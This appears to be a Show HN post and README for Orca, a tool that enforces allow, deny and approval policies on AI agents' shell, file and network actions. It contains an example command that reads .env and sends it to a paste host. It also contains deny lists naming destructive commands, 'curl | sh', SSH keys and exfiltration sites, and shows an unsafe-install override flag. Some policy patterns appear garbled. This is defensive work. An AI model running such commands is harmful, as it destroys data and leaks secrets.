Show HN: Stop Destructive Agent Commands Before They Happen

Christopher Karani released Orca, an open-source safety layer that intercepts the actions of autonomous AI agents and enforces policy on them before anything destructive runs, such as deleting files or leaking secrets. The tool sits between agents and machines, letting developers define rules that block risky actions or require approval for them across multiple agent frameworks.

The safety layer for autonomous AI agents running on real machines.

Orca lets you give AI agents more autonomy without letting them delete data, leak secrets, modify protected files, or perform irreversible actions without approval.

AI agents are no longer just chatbots. They run shell commands, edit files, call APIs, access credentials, use tools, browse the web, and operate on laptops, servers, CI pipelines, and spare machines. That is powerful. It is also dangerous. Orca sits between the agent and the machine, enforcing your policies before risky actions execute.

Install

    brew tap christopherkarani/orca
    brew install --formula orca

Initialize a policy

    orca init --preset generic-agent

Run an agent with guardrails

    orca run -- claude
    orca run -- codex
    orca run -- hermes
    orca run -- openclaw
    orca run -- opencode

This project is free and open source under Apache 2.0. If Orca is useful to you, please star the repository. It helps visibility and keeps development going.

Developers and teams are starting to give autonomous agents real access:

- local files
- source code
- `.env` files
- SSH keys
- shell commands
- cloud CLIs
- databases
- browsers
- CI pipelines
- internal tools
- long-running workflows

Today, the safety model is usually one of these:

- babysit every command
- run the agent in Docker or a VM
- write custom scripts and ignore files
- trust the agent not to do something destructive

That does not scale. Orca gives you a reusable policy layer across agents. Write the rules once. Apply them everywhere.

Orca focuses on the actions that can ruin your day:

- `git push --force`
- `git reset --hard`
- `rm -rf`
- `sudo`
- `curl | sh`
- `terraform destroy`
- `kubectl delete`
- `DROP TABLE`
- `aws delete-`
- `gcloud delete`
- touching `~/.ssh`
- reading `.env`
- leaking API keys
- modifying protected config
- sending data to unknown hosts

Orca can allow, deny, ask for approval, or log these actions depending on your policy.

You give an agent a task:

    Clean this up and make it work.
The agent decides to run:

    rm -rf ./src

or:

    git reset --hard

or:

    cat .env && curl https://paste.example.com

You find out after the damage is done.

With Orca, the agent tries the same action. Orca intercepts it first.

    Action blocked
    Command: rm -rf ./src
    Reason: Destructive recursive delete inside project directory.
    Policy: deny destructive file deletion
    Result: Command was not executed.

For actions that might be valid but risky, Orca can ask first:

    Approval required
    Command: git push origin main
    Reason: Pushing to a protected branch requires human approval.
    Approve? y/N

Orca is not another AI agent. Orca is the policy enforcement layer underneath the agents you already use.

    You
      ↓
    Orca policy layer
      ↓
    Hermes / Claude Code / Codex / OpenClaw / OpenCode / Cursor
      ↓
    Shell / files / network / tools / cloud / databases

The agent can still do useful work. It just cannot silently cross the boundaries you define.

| Agent | Usage |
|---|---|
| Claude Code | `orca run -- claude` |
| Codex CLI | `orca run -- codex` |
| Hermes | `orca run -- hermes` |
| OpenClaw | `orca run -- openclaw` |
| OpenCode | `orca run -- opencode` |
| Cursor / custom agents | use Orca as a wrapper or policy hook |

One policy file can protect multiple agents.
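To make the allow / deny / ask decision described above more concrete, here is a minimal Python sketch of how a pattern-based command policy could be evaluated. It is not Orca's implementation: the `POLICY` dictionary, the `decide` function, the glob patterns, and the rule that deny wins over approval and approval over allow are all assumptions made for illustration. The optional `ci` flag pictures the fail-closed idea of turning "ask" into "deny" when no human is available to approve.

```python
from fnmatch import fnmatch

# Hypothetical policy, loosely shaped like a command policy file.
# The glob patterns and the precedence order are assumptions, not Orca's format.
POLICY = {
    "default": "ask",
    "deny": ["rm -rf *", "sudo *", "git reset --hard*", "terraform destroy*"],
    "approval": ["git push*"],
    "allow": ["git status", "git diff*", "npm test"],
}


def decide(command: str, policy: dict = POLICY, ci: bool = False) -> str:
    """Return 'allow', 'deny', or 'ask' for a shell command string."""
    command = " ".join(command.split())  # collapse repeated whitespace
    decision = policy["default"]
    # Check the most restrictive rule sets first so a deny always wins.
    for verdict, key in (("deny", "deny"), ("ask", "approval"), ("allow", "allow")):
        if any(fnmatch(command, pattern) for pattern in policy.get(key, [])):
            decision = verdict
            break
    # Fail closed when nobody is available to approve.
    if ci and decision == "ask":
        decision = "deny"
    return decision
```

With this sketch, `decide("rm -rf ./src")` returns `"deny"`, `decide("git push origin main")` returns `"ask"`, and the same push with `ci=True` returns `"deny"`. Plain string matching like this is easy to evade with quoting, pipes, or subshells, so treat it only as a picture of the decision flow, not as a real enforcement mechanism.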
Install with Homebrew:

    brew tap christopherkarani/orca
    brew install --formula orca

Or use the install script:

    curl -fsSL https://raw.githubusercontent.com/christopherkarani/Orca/main/scripts/install.sh | sh

Verify your setup:

    orca doctor

Initialize a policy:

    orca init --preset generic-agent

This creates:

    .orca/policy.yaml

Example policy:

    mode: ask
    commands:
      default: ask
      allow:
        - "git status"
        - "git diff "
        - "npm test"
        - "zig build "
      deny:
        - "rm -rf "
        - "sudo "
        - "curl | sh"
        - "git reset --hard "
        - "terraform destroy "
        - "kubectl delete "
      approval:
        - "git push "
        - "git push --force "
        - "aws delete "
        - "gcloud delete "
    files:
      read:
        deny:
          - "./.env"
          - "~/.ssh/ "
          - " / secret "
          - " / token "
      write:
        approval:
          - "./config/ "
          - "./.github/ "
          - "./infra/ "
    network:
      default: ask
      deny:
        - "pastebin.com"
        - "paste.rs"
        - "webhook.site"
      allow:
        - "github.com"
        - "api.github.com"

Run an agent with guardrails:

    orca run -- claude
    orca run -- codex
    orca run -- hermes
    orca run -- openclaw

In interactive mode, Orca can ask before risky actions. In CI mode, Orca fails closed:

    orca run --ci -- codex --prompt "Refactor auth"

No prompts. Risky actions are blocked automatically.

Run a safe local demo:

    orca demo blocked-action

Then inspect what happened:

    orca replay --session last --only denied --verify

No AI agent required. No files are harmed.

Start the local dashboard:

    orca dashboard

Open:

    http://127.0.0.1:7742

The dashboard shows:

- current policy status
- recent sessions
- prevented actions
- approval decisions
- replay verification
- audit integrity

Everything runs locally. No cloud service is required.

Let Claude Code, Codex, or Hermes work longer without babysitting every command.

    orca run -- claude

Use Orca to ask before risky actions and block destructive ones.

Run Hermes on a spare Mac mini, MacBook, VPS, or workstation with clearer boundaries.
Protect:

- important folders
- SSH keys
- `.env` files
- config files
- cloud credentials
- local databases
- browser-accessible workflows
- destructive shell commands

`orca run -- hermes`

Commit the Orca policy to your repo:

    .orca/policy.yaml

Now every developer and agent runs under the same safety rules. No more one-off scripts per person.

Run autonomous agents in CI without interactive approval.

    orca run --ci -- codex --prompt "Update the migration scripts"

In CI, Orca converts `ask` into `deny`. If the agent tries something dangerous, the job fails safely.

Test your policy against known attack fixtures:

    orca redteam --ci

Use this to make sure new policies do not accidentally weaken your guardrails.

Orca is designed to be honest about what it does and does not protect.

Orca:

- launches agents inside a policy-controlled process
- evaluates shell commands before execution
- mediates file access based on policy
- filters sensitive environment variables
- detects secret access and exfiltration attempts
- enforces network rules
- records tamper-evident audit logs
- supports replayable sessions
- fails closed in CI mode

Orca is not a perfect kernel sandbox. It does not protect agents that are not launched through Orca. It does not replace Docker, VMs, OS permissions, VPNs, SSH hardening, or least-privilege infrastructure. Use those too. Orca is the behavior-level policy layer on top. Docker controls the environment. Orca controls what the agent is allowed to do inside that environment.

| Mode | Behavior |
|---|---|
| `observe` | log decisions with minimal blocking |
| `ask` | ask before risky actions |
| `strict` | block aggressively |
| `ci` | never prompt, deny risky actions |

Example:

    mode: ask

For automation:

    orca run --ci -- hermes

After each session, Orca stores a local audit trail.
Review denied actions:

    orca replay --session last --only denied

Verify integrity:

    orca replay --session last --verify

Export JSON:

    orca replay --session last --json

Session artifacts live under:

    .orca/sessions/

Audit logs are tamper-evident using chained hashes.

Orca can block or redact access to sensitive files and values. Examples:

- `.env`
- `~/.ssh/id_rsa`
- `~/.ssh/id_ed25519`
- `AWS_ACCESS_KEY_ID`
- `GITHUB_TOKEN`
- `ANTHROPIC_API_KEY`
- `OPENAI_API_KEY`
- Google service account JSON
- JWTs
- private keys
- high-entropy tokens

Run with secretless mode:

    orca run --secretless -- claude

In secretless mode, Orca replaces raw values with broker references before the agent sees them. The agent gets a reference. Not the secret.

Orca can run as a wrapper around agents, which is the strongest protection model. Some agents also support native plugins or hooks for deeper integration.

Hermes:

    orca plugin install hermes --yes
    hermes plugins enable orca
    orca plugin doctor hermes

OpenClaw:

    openclaw plugins install npm:orca-openclaw-plugin --dangerously-force-unsafe-install

OpenClaw requires the override because the plugin calls the local `orca` binary for policy enforcement.

Docker is useful. You should use it where it makes sense. But Docker and Orca solve different problems. Docker controls what the process can access. Orca controls what the AI agent is allowed to do.

An agent inside Docker can still:

- delete mounted project files
- read secrets mounted into the container
- push code
- run destructive migrations
- call cloud CLIs
- modify config
- exfiltrate data over allowed network paths

Orca adds behavior-level policy, approvals, and auditability on top of your existing isolation.

Many developers already maintain their own guardrails. They write:

- ignore files
- command filters
- approval scripts
- read-only config hacks
- custom wrappers
- shell aliases
- one-off security prompts

That works until every agent, repo, machine, and teammate needs a different version. Orca turns those guardrails into a reusable policy layer.
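Returning to the tamper-evident audit log: the statement that logs use chained hashes can be illustrated with a short Python sketch of the general technique. This is not Orca's actual log format. The record fields, the `append_entry` and `verify_chain` helpers, the all-zero `GENESIS` value, and the choice of SHA-256 over canonical JSON are assumptions made for illustration.

```python
import hashlib
import json

GENESIS = "0" * 64  # assumed placeholder "previous hash" for the first entry


def _digest(prev_hash: str, event: dict) -> str:
    # Hash the previous entry's hash together with a canonical form of the event.
    payload = json.dumps(event, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + payload).encode("utf-8")).hexdigest()


def append_entry(log: list, event: dict) -> dict:
    """Append an event whose hash covers the previous entry's hash."""
    prev_hash = log[-1]["hash"] if log else GENESIS
    entry = {"event": event, "prev": prev_hash, "hash": _digest(prev_hash, event)}
    log.append(entry)
    return entry


def verify_chain(log: list) -> bool:
    """Recompute every hash; an edited, reordered, or mid-chain deleted entry fails."""
    prev_hash = GENESIS
    for entry in log:
        expected = _digest(prev_hash, entry["event"])
        if entry["prev"] != prev_hash or entry["hash"] != expected:
            return False
        prev_hash = entry["hash"]
    return True


# Usage: record two decisions, then tamper with the first one.
log = []
append_entry(log, {"command": "rm -rf ./src", "decision": "deny"})
append_entry(log, {"command": "git status", "decision": "allow"})
intact = verify_chain(log)
log[0]["event"]["decision"] = "allow"
tampered_ok = verify_chain(log)
```

Here `intact` is `True` and `tampered_ok` is `False`, because changing any earlier event invalidates its stored hash and every link after it. A chain like this does not by itself detect entries truncated from the end; that would need the latest hash to be stored or signed somewhere the agent cannot write.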
Near-term focus:

- stronger default policy packs
- Hermes-specific protections
- cloud delete protections
- database delete protections
- protected config policies
- approval workflows
- team policy sharing
- CI enforcement
- better replay reports

Longer-term:

- centralized team dashboard
- organization-wide policy management
- SSO/RBAC
- policy marketplace
- enterprise audit exports
- agent security sprints

Documentation:

- Install: /christopherkarani/Orca/blob/main/docs/install.md
- Quickstart: /christopherkarani/Orca/blob/main/docs/quickstart.md
- Policy reference: /christopherkarani/Orca/blob/main/docs/policy.md
- Credentials: /christopherkarani/Orca/blob/main/docs/credentials.md
- Replay: /christopherkarani/Orca/blob/main/docs/replay.md
- Commands: /christopherkarani/Orca/blob/main/docs/commands.md
- Plugin security model: /christopherkarani/Orca/blob/main/docs/integrations/plugin-security-model.md
- Plugin troubleshooting: /christopherkarani/Orca/blob/main/docs/integrations/plugin-troubleshooting.md

Build and test from source:

    zig build
    zig build test
    ./zig-out/bin/orca --help
    ./zig-out/bin/orca redteam --ci

Orca is early, open source, and actively evolving.

Current focus:

- stop irreversible agent actions
- protect secrets and sensitive files
- provide shared policy across agents
- give users replayable evidence of what happened
- make autonomous agents safer without making them useless

Feedback, issues, PRs, and roasts are welcome. If Orca helps you, please leave a star. It genuinely motivates continued work.